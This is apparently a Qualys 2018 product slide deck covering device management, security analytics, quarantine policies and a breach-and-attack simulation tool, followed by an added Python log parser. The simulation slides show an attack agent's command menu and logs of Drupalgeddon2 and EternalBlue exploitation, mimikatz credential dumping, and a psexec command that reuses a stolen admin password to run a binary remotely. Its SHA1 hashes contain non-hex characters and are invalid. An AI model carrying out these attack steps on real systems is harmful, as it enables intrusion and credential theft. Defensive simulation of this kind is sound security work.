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Screenshot: Qualys Mobile Device Management demo, Inventory tab (Dashboard | Inventory | User Profiles | Configurations), filtered to the last 30 days. Eight enrolled devices are listed with the columns Last Seen, Asset Information, Operating System, Status and Inventory Tags:
- Android: Mark, Jack and Andy (Lenovo TAB 7, Android 7.0); Michael (Motorola Moto G, Android 7.1.2); William (Asus, Android 7.0); Charles (Asus ZenFone Zoom S, Android 7.1.1)
- iOS: James (Apple, iOS 12.0); Richard (Apple iPhone, iOS 11.2.5)
Every device is Corporate - Owned with status Enrolled / Active and carries an Android or iOS inventory tag; last-seen times run from Sep 25 to Oct 05, 2018 (IST), and each row shows its Modified On date.
© Qualys.
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Screenshot: Asset Details for Station10_Tab1_LENOVO.
Asset Summary: Android v7.0, Lenovo TB-7504X (Manufacturer: Lenovo). Status: Unauthorized Root Access, Non Compliant. Passcode: Present. Encryption and Profiles indicators are shown.
Identification: Asset Name Lenovo TB-7504X; Status Enrolled; Mode Active; Ownership Corporate - Owned; Username fCgby8os; User Email not set; Enrolled with AFW: Yes.
Activity: Last Seen Nov 14, 2018 12:05 PM PST; Enrolled On Oct 9, 2018 11:29 AM PST; Modified On Oct 10, 2018 11:29 AM PST.
Last Location: Fuquay-Varina, North Carolina, United States; Last Seen Nov 14, 2018 12:05 PM PST; IP Address shown (illegible in the capture).
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Screenshot: Asset Details for Station10_Tab1_Lenovo, Logs / Location / Actions tabs and the Device Apps list.
Required-app check (Name, Identifier, Version, System App, Status, Detected On):
- ACME Auto Service Booking, com.acme.auto.service.booking, 1.1 (2), System App: No, Status: Missing, detected Nov 09, 2018 09:30 PM PST
- ACME Customer Feedback, com.acme.cust.feedback, System App: No, Status: Found, detected Nov 09, 2018 09:30 PM PST
Device Apps (13), columns Name, Identifier, Version, System App, Uses Mock Location, Installed On, Action (identifiers and version strings are truncated in the capture):
- TeamViewer: System App No, Uses Mock Location No, installed Nov 09, 2018 04:37 PM PST, Uninstall
- Inkwire: No, No, Nov 09, 2018 04:23 PM PST, Uninstall
- Gboard: System App Yes, No, Nov 09, 2018 12:49 PM PST
- Gmail: Yes, No, Nov 09, 2018 12:49 PM PST
- oneAssistant: No, No, Nov 09, 2018 12:32 PM PST, Uninstall
- Chrome: No, No, Nov 09, 2018 10:12 PM PST, Uninstall
- Maps: Yes, No, Nov 08, 2018 10:26 PM PST
- Google Play Movies & TV: Yes, No, Nov 06, 2018 10:40 PM PST
- Gallery: Yes, No, Nov 06, 2018 10:40 PM PST
- Drive: Yes, No, Nov 06, 2018 10:39 PM PST
- SnoopSnitch: No, No, Nov 05, 2018 12:02 PM PST, Uninstall
- YouTube: Yes, No, Nov 05, 2018 11:38 PM PST
- Google Play Store: Yes, No, Nov 05, 2018 11:35 PM PST
No app reports Uses Mock Location; the Uninstall action is offered only for the non-system apps.
QSC Conference © Qualys.
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Asset Details: Station10_Tab1_LENOVO - remote actions available for the asset, as described in the UI:
- Locks the screen of the asset. The asset will be unusable until it is unlocked.
- Send a message to the user of the asset. The message will be sent as a Push Notification.
- Poll Mode: the asset will communicate with the Qualys server at the specified regular interval. Push Mode: the Qualys server will communicate with the asset only when a new action is scheduled for the asset.
- The asset will buzz and its current geolocation will be sent to the server, provided Location Services are enabled.
- Sync asset information on demand.
- The asset will be de-enrolled and the server will no longer be able to communicate with the device. Corporate data on the asset will also be deleted.
- The asset will be factory reset. The server will no longer be able to communicate with the asset.
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Feb 2019 - Closed Beta 
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Security Analytics & Orchestration
Diagram elements:
- Human Guided Response
- Policy-Driven Response: Playbooks for Bi-Directional Ecosystems Integration; BYOP - Bring-Your-Own-Playbook
- Correlation: Detect KNOWN threats with out-of-box rules
- Cross-Product Correlation: Additional Context from 3rd Party Sources
- Advanced Analytics: Detect UNKNOWN threats using Machine Learning; Hacker Behavioral Analytics
- Predictive & Prescriptive SoC
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Security Analytics & Orchestration Apps (layered architecture, top to bottom)
- ML/AI Service: Patterns | Outlier | Predictive SoC; Orchestration & Automation: Ecosystems Integration | Playbooks | Response; UEBA: User & Entity Behavior Analytics
- Threat Hunt: Search | Exploration | Behavior Graph; Security Analytics: Anomaly | Visualization | Dashboard; Advanced Correlation: Actionable Insights | Out-of-box Rules
- Qualys Security Data Lake Platform: Data Ingestion | Normalization | Enrichment | Governance
- Data sources: Network, Security, Server, Endpoint, fed through Qualys Apps and Qualys Quick Connectors
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Characteristics of Data Lake: Collect Anything | Dive in Anywhere | Flexible Access | Future Proof

What is Security Data Lake?
- Single data store (single source of truth)
- Structured and unstructured data
- Data is transformed, normalized, and enriched (Threat Intelligence feed integration, GeoIP, etc.)
- Data has governance, semantic consistency, and access controls
- Store-once / Process-once / Use-multiple: apps, dashboards, data analytics; cross-product search, reporting, visualization; machine learning, forensics, etc.
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Qualys Apps: Graphs/Topology | Reports | Dashboards | Search & correlation | Cyber threat hunting | Orchestration, Automation & Alerting | Anomaly detection | User & entity behavior analytics
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Use-cases 

Capabilities 

Policy-based orchestration 
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Use Cases
- Grant access to resources only on a need basis. Block everything else.
- Automated asset attribute processing and enforcement without the need for manual action.
- Limit access (e.g. quarantine) of vulnerable assets.
- Block vulnerable assets from accessing critical network resources.


Use Cases
Asset Inventory - Access control using asset inventory attributes
Diagram: Managed Assets and Unmanaged Assets connect through the network switch; the inventory Attributes evaluated are System Information, Hardware, Operating System, Services, Network Interfaces, Open Ports, Software Inventory and Software Lifecycle; the resulting action is Allow, Quarantine or Assign ACL.
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Use Cases
Vulnerabilities - Quarantine assets if vulnerable
Diagram: a Vulnerability is Found on host LDC-01 in the Local Data Center; the picture shows the Remote Data Center, infrastructure services (DHCP, DNS, Active Directory) and an allowlist of Microsoft update URLs (windowsupdate.microsoft.com, update.microsoft.com, http://download.microsoft.com) that the quarantined asset may still reach.
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Use case (diagram): Block assets which fail compliance
Diagram elements: File Integrity (Controls, Mandates, Control Policies); Indicators of Compromise attributes (Family, Category, Score; event types File, Network, Process, Registry, Mutex, Incidents; threat flags Zero Day, Public Exploit, High Data Loss, DoS, No Patch, Attacked, Exploit Kit, High Lateral Movement; Action, Target, Actor); resulting action: Block.
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Policy-based Orchestration
Diagram: Security Control -> Server.company.co -> Ruleset -> Trigger
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Screenshot: Indicators of Compromise app (Dashboard | Hunting | Incidents | Assets | Rules), Alerts view, last 30 days, 64K total events.
Filters: Type (file 1.4K, mutex 300, network 200, process 300, registry 100), Event Action (connected 400, created 300, deleted 200, disconnected 123), Score (10: 564, 8: 421, ...), plus Processor / Memory / HDD.
Events (Time, Object, Asset, Score), all on asset WIN8-1-UN-PATCH (10.115.76.190) at 12:10:17 AM: process WmiPrvSE.exe (C:\Windows\system32\wbem\wmiprvse.exe); mutex \BaseNamedObjects\F659A567-8ACB-4E4A-92A7-5C2DD18... (taskhost.exe); process SearchProtocolHost.exe (C:\Windows\system32\SearchProtocolHost.exe); UDP CONNECTION - CLOSED by svchost.exe; process taskhost.exe (C:\Windows\system32\taskhost.exe); process SearchFilterHost.exe (C:\Windows\system32\SearchFilterHost.exe).
Quick Actions menu on an event: Event Details, Asset Details, Quarantine, Delete File.


Screenshot: Quarantine Asset dialog (three states).
Policy: (o) Auto Create New Policy  ( ) Select From Existing Policies; Policy Name: Select.
Existing policies offered: Quarantine for all MacOS - Policy to quarantine all Mac OS vulnerability; Block all WannaCry - Policy to block all WannaCry vulnerable assets; Quarantine Policy for QSC - Policy to block all QSC vulnerable assets.
With Auto Create New Policy selected: Policy Name "Quarantine policy for Asset: 10.19.57.65"; Description "This is an auto created Quarantine policy for Asset".
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View & Define
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Screenshot: Secure Access Control (Dashboard | Policies | Monitoring | Configuration), Policies tab, user John Doe. 79 policies in total, 1-50 shown.
Filters: Status (Enabled 07, Disabled 05); Dynamic Asset Criteria (High Vulnerability Mac, All Corporate Assets, All Windows Assets, All Linux Assets, All Mac Assets, All Laptops); Asset List (Management Assets, All Printers, IOT Devices, Blacklisted Hosts, Blacklisted Mac Addresses); Rule Type (Outbound 05, Inbound 07); Actions (Allow 07, Deny 22, VLAN Switch 16); Service (HTTP 05, SSH 07, ANY 22, UDP 16); Protocols (TCP 05, UDP 07).
Policies listed (Status | Policy | Ruleset | Asset criteria | Eligible on assets):
- Enabled | Quarantine Policy for QSC | VLAN 20 | High Vulnerability Mac | 48
- Enabled | Automatic Policy for Asset: 10.19.57.65 | ACL "ACL Name example" | WannaCry Assets Criteria | 29
- Enabled | Quarantine all Mac OS High Sierra Vulnerability... | VLAN 20 | High Vulnerability Mac | 48
- Enabled | Block all WannaCry Vulnerable assets | ACL "ACL Name example" | WannaCry Assets Criteria | 22
- Enabled | Notify all Heartbleed Vulnerable openSSL servers | Traffic Rules: Quarantine Ruleset | Heartbleed Asset Criteria | 35
- Enabled | Quarantine VLAN if OS is not updated | Traffic Rules: OS Update Check Ruleset | Assets Missing OS Update | 34
- Enabled | Quarantine VLAN if Antivirus is not updated | Traffic Rules: 3 Rules | Assets Missing AV Updates | 11
- Enabled | Access to engineering resources for engineering team | Traffic Rules: 3 Rules | High Vulnerability Mac | 500
- Enabled | Policy for feedback Kiosk at reception | Traffic Rules: 3 Rules | High Vulnerability Mac | 123
- Enabled | Block all outbound connections to Chinese servers | Traffic Rules: 3 Rules | High Vulnerability Mac | 123
- Enabled | Deny access to all vulnerable laptops | Traffic Rules: 3 Rules | High Vulnerability Mac | 72
- Enabled | Quarantine Vulnerable servers | Traffic Rules: 3 Rules | High Vulnerability Mac | 48
Criteria
WannaCry Asset Criteria
Criteria types available: Compliance | Vulnerability | Custom Criteria
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← Create New: Criteria


Criteria types: User | Hosts/Assets | Vulnerability | Compliance | Malware | Location | Saved Criterias | Custom Criteria

WannaCry Asset Criteria
Rule 1: New or Active Vulnerability
  When a vulnerability is: [x] New  [ ] Fixed  [x] Active  [ ] Reopened
  Select Criteria: Users | Hosts | Vulnerability | Compliance | Malware | Location
Vulnerability Criteria
  Type: [x] Confirmed  [x] Potential
  Severity: (selector)
  Title: Is in the list (910, 1027)
  CVE: Select
  CVSS Score: Select
  + Add Criteria
Cancel
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Screenshot: View Details: WIN-HL64HBLJP02 (asset view). View Mode sections: Summary, System Information, Agent Summary, Network Information, Open Ports, Installed Software, Vulnerabilities, Threat Protection, File Integrity Monitoring, Indicator of Compromise, Patch Management, Security Access Control.
Security Access Control section: policies applied to this asset with timestamps - Access to engineering resources fo..., Allow internal server access to all e..., Allow internet access to all employe... (Nov 09, 2018 at 10.05 AM, 9.17 AM and 9.15 AM), Outbound connections to malicious websites, Prevent access to finance and payroll server, Quarantine VLAN if Antivirus is not updated (Today).
Policy Timeline (P1-P5, 9:00 AM to Now; event "Quarantine Policy Applied..." at Oct 12, 2018, 2:13 AM), Policy Eligibility Timeline, Last 5 Enforced Policies (Policy Name, Time) and Never Enforced Eligible Policies (Policy Name).
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Best of Two Worlds
- In-Line Appliance (appliance enforces): reliable first-hand data; low latency for data collection and enforcement
- Out of Band Switches: multiple enforcement options; traffic volume agnostic
SAC offers both modes - Powerful Together - Unique Value Proposition
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Breach & Attack Simulation
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Problems
- Limited assessment scope and capabilities
- Red Team operations can get expensive, not scalable, and lack completeness across the enterprise
- Lack of confidence in the effectiveness of security investments - prevention and detection
- Blue Teams struggle to evaluate the impact of new attacks against their existing security controls
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Screenshot: Breach and Attack Simulation (Dashboard | Scans | Assets | Campaigns), filtered by asset tags, last 30 days, last refreshed 2 minutes ago.
Summary tiles: Available Campaigns, Techniques and assets; Tactics Overview by Failing Techniques across Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration and Command and Control; Asset Breakdown by Severity (1.1K total); Scans by Status (22 total, e.g. Scheduled 6).
Top 5 Failing Techniques: Application Shimming 165 (High); Exploit Public-Facing Application 84 (High); Logon Scripts 83; Email Collection 73; File System Permissions Weakness 64.
Most Failing Campaigns: weakness.exploit.msword.phish (Jan 01, 2018) 165; exploit.compliance.eternalblue (Feb 15, 2018) 84; weakness.compliance.password.reuse (Jun 02, 2018) 83; exploit.vulnerability.drupalgeddon2 (Aug 23, 2018) 73.
Technical Approach
- Automated simulation of real-world TTPs
- Scale security assessments across the entire enterprise utilizing Qualys Cloud Agent
- Real-time insights mapped to MITRE ATT&CK™ framework
- Transition towards defense strategies based on offensive techniques
- Continuously measure security control drift over time
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Qualys Breach and Attack Simulation (v0.1)
Breach & Attack Simulation: centralized command-and-control framework on Cloud Agent. When enabled, agents act as adversaries (caption partly illegible). Non-destructive TTPs or live exploits.
Agent console help screen (Command - Description; command names are cut off in the capture except where shown):
- Show contents of a file
- Connect to an agent
- List connected agents
- Show this help menu
- Kill an active agent connection
- List files in current directory
- Get current working directory
- zip <file> - Zip a file
- download <url> - Download a file from the asset
- upload <url> - Upload a file to the asset
- Show IP-MAC pairs from system ARP table
- execute <command> - Execute a command on the asset
- openports - Scan and show status for top 1024 TCP ports on the asset
- Collect metadata about the asset
- Cleanup all traces of agent from the asset
- Exit the current agent connection
Modules:
- T1190 - drupalgeddon2: the Drupalgeddon2 exploit
- T1190 - apachestruts: the Apache Struts S2-057 exploit
Execution:
- psexec: Psexec for command execution
- T1191 - cmstp: CMSTP.exe with a malicious .inf file for file execution
- T1173 - windde: DDE to run arbitrary commands
Persistence: (list cut off in the capture)

Breach & Attack 
Simulation 


Use case: 


Drupalgeddon2 


(CVE-2018-7600) 


>>> use 1 


[+] Opening up live session with agent #1 (192.168.1.100) 
(agent #1) >>> drupalgeddon2 
URL for a public facing Drupal webapp (https://corpdomain.tld/blog): 


Please provide 
[20/Nov/2018] 
[20/Nov/2018] 
tld/blog 
[20/Nov/2018] 
NGELOG.txt 
[20/Nov/2018] 
-2018-7600 
[20/Nov/2018] 


a 




Session output (timestamps 20/Nov/2018, 13:54-13:55 PM):
[STATUS]: Testing for T1190: Exploit Public-Facing Application
[T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog
[T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tld/blog/CHANGELOG.txt
[T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
[T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
[STATUS]: Waiting for connection from sda32fds.exe
[STATUS]: Connection received on TCP 32282
[STATUS]: Process information sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
[INFORMATION]: Current QAttack agent privileges: user
[SYSTEMINFO]: Currently logged on user: CORP/user1
[SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601)
[SYSTEMINFO]: Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz
[SYSTEMINFO]: Installed memory (RAM): 12.0 GB
[SYSTEMINFO]: System type: 64-bit Operating System, x64-based processor
[SYSTEMINFO]: Locale: EN-US
[SYSTEMINFO]: Computer name: THINKPAD-111991-M710
[SYSTEMINFO]: Full computer name: T-111991-M710.corp.domain.com
[SYSTEMINFO]: Domain: corp.domain.com
[SYSTEMINFO]: Anti Virus installed: Yes
[SYSTEMINFO]: Anti Virus detected: Symantec Endpoint Protection Small Business
[STATUS]: T1018: Found 3 neighbors using discovery module
[INSECURECONFIG]: Found SMB v1 enabled on 192.168.1.101
[STATUS]: Testing for T1210: Exploitation of Remote Services
[EXPLOITSUGGESTER]: Launching ETERNALBLUE module against 192.168.1.101
[T1210][INFORMATION]: Module ETERNALBLUE in progress
[EXPLOIT]: Sent 308B shellcode
[EXPLOIT]: Module ETERNALBLUE successful.
[LATERALMOVEMENT]: Pivoting from 192.168.1.100 to 192.168.1.101 via Module ETERNALBLUE
[EXPLOIT]: QAttack agent copy sent to 192.168.1.101
[INFORMATION]: QAttack agent information: sdfwe3223d.exe (SHA1: e41a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
[20/Nov/2018] 13:55:10 PM [STATUS]: All tests complete.

(agent #1) >>>
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Screenshot: Live View: Drupalgeddon2 (Cancel | Done).
Identification: Scan: Drupalgeddon2; Campaign: exploit.vulnerability.drupalgeddon2; Status: InProgress. Tactics Breakdown by Status chart.
Filters: Tactics (Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, 6 more); Status (Breached, Safe, Error); Operating System (Windows 2012 Server, Windows Server 2012 R2, Windows Server 8.1, Windows 7 SP1, Windows 10 ENTERPRISE, 2 more).
Attack graph: 192.168.1.100 (Hostname https://corpdomain.tld, Username CORP/administrator, Processor AMD ThreadRipper 1980X, Privileges administrator), 192.168.1.101 (THINKPAD-98689-M710, Breached), 192.168.1.103, 192.168.1.105, 192.168.1.110.
Per-asset log:
[11/10/2018] 10:01:27 AM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application
[11/10/2018] 10:01:28 AM [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog
[11/10/2018] 10:01:35 AM [T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tld/blog/CHANGELOG.txt
[11/10/2018] 10:01:43 AM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
[11/10/2018] 10:01:51 AM [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
[11/10/2018] 10:01:52 AM [STATUS]: Waiting for connection from sda32fds.exe


Breach & Attack Simulation
Use case: Credential Harvesting and Reuse
1. Uploading / running mimikatz
2. Extracting stored credentials
3. Lateral movements

mimikatz(commandline) # exit
[+] Showing current cache:
- Category: local; Type: wdigest; Username: Administrator; Password: Abcxxxxxxx5; Domain: VSWIN2K8R2SP1BE
- Category: local; Type: kerberos; Username: Administrator; Password: Abcxxxxxxx5; Domain: VSWIN2K8R2SP1BE
- Type: kerberos; Username: vswin2k8r2sp1be$; Domain: WORKGROUP
- Category: application:proxy; Type: credman; Username: Administrator; Password: Abcxxxxxxx5; Domain: VSWIN2K8R2SP1BE

[20/Nov/2018] 13:58:31 PM [T1003][INFORMATION]: (credential cache as listed above)
[20/Nov/2018] 13:58:32 PM [CLEANUP]: Deleted file mimikatz (SHA1: d40a48094c1f21fef892f27a8b6a7ed2bb0c27f)
[20/Nov/2018] 13:58:33 PM [T1003][INFORMATION]: Passwords extracted: 4
[20/Nov/2018] 13:58:34 PM [T1003][INFORMATION]: Test successful

(agent #1) >>> lateral
[20/Nov/2018] 14:32:29 PM [STATUS]: Testing for T1077: Windows Admin Share
[20/Nov/2018] 14:32:29 PM [SHARE-SCAN]: Scanning for shares on: 192.168.1.101, 192.168.1.102
[20/Nov/2018] 14:32:30 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.101
[20/Nov/2018] 14:32:31 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.102
[20/Nov/2018] 14:32:32 PM [T1077][INFORMATION]: Admin shares enumerated
[20/Nov/2018] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts
[20/Nov/2018] 14:32:34 PM [T1078][INFORMATION]: Testing for passwords retrieved using T1003
[20/Nov/2018] 14:32:35 PM [STATUS]: Windows admin$ share detected on 192.168.1.101
[20/Nov/2018] 14:32:36 PM [T1078][INFORMATION]: Credentials detected administrator:Abcxxxxxxx5
[20/Nov/2018] 14:32:37 PM [STATUS]: Attempting lateral movement using re-used credentials
[20/Nov/2018] 14:32:38 PM [STATUS]: Testing for T1035: Service Execution
[20/Nov/2018] 14:32:38 PM [T1035][INFORMATION]: Read psexec.exe location from configuration: \\software\psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Attempting remote file copy: copy /y \\192.168.1.100\ds345gfed.exe \\192.168.1.101\c$\
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: [illegible] -nobanner -d \\192.168.1.101 -u administrator -p Abcxxxxxxx5 "C:\ds345gtgd.exe"
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Test successful.
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: End execution: psexec.exe
[20/Nov/2018] 14:32:39 PM [CLEANUP]: Deleted file psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)
[20/Nov/2018] 14:32:40 PM [STATUS]: All tests complete.

(agent #1) >>>
Screenshot: Live View: Password Reuse (Cancel | Done).
Identification: Scan: Password Reuse; Campaign: weakness.compliance.password.reuse; Status: InProgress (34%); 8 assets. Tactics Breakdown by Status chart.
Filters as in the Drupalgeddon2 view: Tactics (Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, 6 more), Status (Breached, Safe), Operating System (Windows 2012 Server, Windows Server 2012 R2, Windows Server 8.1, Windows 7 SP1, Windows 10 ENTERPRISE, 2 more).
Attack graph: 192.168.1.101 (Hostname THINKPAD-98689-M710, Username CORP/user1, Processor Intel (R) CORE(TM) i7-7770, Privileges administrator, Breached, View details) with neighbours 192.168.1.104, 192.168.1.105, 192.168.1.106 and 192.168.1.107.
Per-asset log:
[11/10/2018] 10:01:11 AM [INFORMATION]: QAttack agent initialized via QAgent. Process name: adfg32dsff.exe
[11/10/2018] 10:01:12 AM [INFORMATION]: Current QAttack agent privileges: user
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Currently logged on user: CORP/user1
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601)
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Installed memory (RAM): 12.0 GB


Benefits
- Fully and continuously assess known and emerging TTPs against all applications and operating systems
- Red Teams augment manual penetration testing of primary systems with automated testing of secondary and tertiary systems
- Empirically measure the effectiveness of security prevention and detection tools
- Blue Teams configure current tools to perform better or procure new/replacement tools
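An added example, not part of the Qualys deck or the QAttack tooling: Python that parses scan logs in the format shown above into a per-asset, per-technique scorecard, counts failing techniques by ATT&CK tactic the way the dashboard tile does, and diffs two runs to measure control drift (the "Empirically measure" and "control drift over time" points). The log lines, the second run and the "Test blocked" outcome message are constructed (the deck only shows "Test successful" outcomes), and the technique-to-tactic table is my own simplification of ATT&CK.

```python
"""Turn QAttack-style scan output (the log format shown in this deck) into a
per-asset, per-technique control scorecard, count failing techniques by ATT&CK
tactic as the dashboard does, and diff two runs to measure control drift.
In the dashboard a 'failing technique' is one the simulated adversary completed,
so 'Test successful' in the log is a FAIL for the defensive control.
The two logs, the second run and the 'Test blocked' message are constructed for
this example; the deck only shows 'Test successful' outcomes."""
import re

# One log line: "[20/Nov/2018] 14:32:33 PM [TAG][KIND]: message" (KIND optional).
LINE = re.compile(r"^\[(?P<date>[^\]]+)\]\s+(?P<time>\d{2}:\d{2}:\d{2})\s+[AP]M\s+"
                  r"\[(?P<tag>[A-Z0-9-]+)\]\s*(?:\[\s*(?P<kind>[A-Z]+)\s*\])?:\s*(?P<msg>.*)$")
# Session banner that tells us which asset the following lines are about.
SESSION = re.compile(r"^\[\+\] Opening up live session with agent #\d+ \((?P<ip>[\d.]+)\)")

# Technique -> tactic. Follows MITRE ATT&CK; where ATT&CK lists a technique under
# several tactics (e.g. T1078 Valid Accounts) one is chosen here for simplicity.
TACTIC = {"T1190": "Initial Access", "T1035": "Execution", "T1003": "Credential Access",
          "T1018": "Discovery", "T1210": "Lateral Movement", "T1077": "Lateral Movement",
          "T1078": "Initial Access"}

def parse_run(log: str) -> dict:
    """Return {(asset_ip, technique): 'FAIL' | 'PASS'} for one scan log."""
    results, asset = {}, None
    for raw in log.splitlines():
        line = raw.strip()
        s = SESSION.match(line)
        if s:
            asset = s["ip"]
            continue
        m = LINE.match(line)
        if not m or asset is None:
            continue
        tag, msg = m["tag"], m["msg"]
        if not re.fullmatch(r"T\d{4}", tag):
            continue                         # STATUS, SYSTEMINFO, CLEANUP ... lines
        if msg.startswith("Test successful"):
            results[(asset, tag)] = "FAIL"   # technique worked: the control failed
        elif msg.startswith("Test blocked"):
            results[(asset, tag)] = "PASS"   # constructed outcome: the control held
    return results

def failing_by_tactic(results: dict) -> dict:
    """The 'TACTICS OVERVIEW BY FAILING TECHNIQUES' tile: FAIL counts per tactic."""
    counts = {}
    for (_, tech), status in results.items():
        if status == "FAIL":
            tactic = TACTIC.get(tech, "Unknown")
            counts[tactic] = counts.get(tactic, 0) + 1
    return counts

def control_drift(previous: dict, current: dict) -> dict:
    """Compare two runs: regressions (PASS -> FAIL), improvements (FAIL -> PASS)
    and techniques exercised before but not in the current run (coverage lost)."""
    return {
        "regressions": sorted(k for k, s in current.items()
                              if s == "FAIL" and previous.get(k) == "PASS"),
        "improvements": sorted(k for k, s in current.items()
                               if s == "PASS" and previous.get(k) == "FAIL"),
        "untested": sorted(set(previous) - set(current)),
    }

# Constructed logs in the deck's format (asset, dates, times and outcomes made up).
RUN_1 = """\
[+] Opening up live session with agent #1 (192.168.1.100)
[20/Nov/2018] 13:54:01 PM [STATUS]: Testing for T1190: Exploit Public-Facing Application
[20/Nov/2018] 13:54:09 PM [T1190][INFORMATION]: Test successful
[20/Nov/2018] 13:54:30 PM [STATUS]: Testing for T1210: Exploitation of Remote Services
[20/Nov/2018] 13:54:40 PM [T1210][INFORMATION]: Test successful
[20/Nov/2018] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts
[20/Nov/2018] 14:32:36 PM [T1078][ INFORMATION]: Test blocked
"""
RUN_2 = """\
[+] Opening up live session with agent #1 (192.168.1.100)
[04/Dec/2018] 09:10:01 AM [STATUS]: Testing for T1190: Exploit Public-Facing Application
[04/Dec/2018] 09:10:09 AM [T1190][INFORMATION]: Test blocked
[04/Dec/2018] 09:10:30 AM [STATUS]: Testing for T1078: Valid Accounts
[04/Dec/2018] 09:10:36 AM [T1078][INFORMATION]: Test successful
"""

if __name__ == "__main__":
    first, second = parse_run(RUN_1), parse_run(RUN_2)
    print("failing by tactic (run 1):", failing_by_tactic(first))
    print("drift run 1 -> run 2:", control_drift(first, second))
```

Between the two constructed runs the public-facing exploit is now blocked but credential reuse newly succeeds, and T1210 was not exercised at all, which is the kind of drift a single pass/fail count would hide.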


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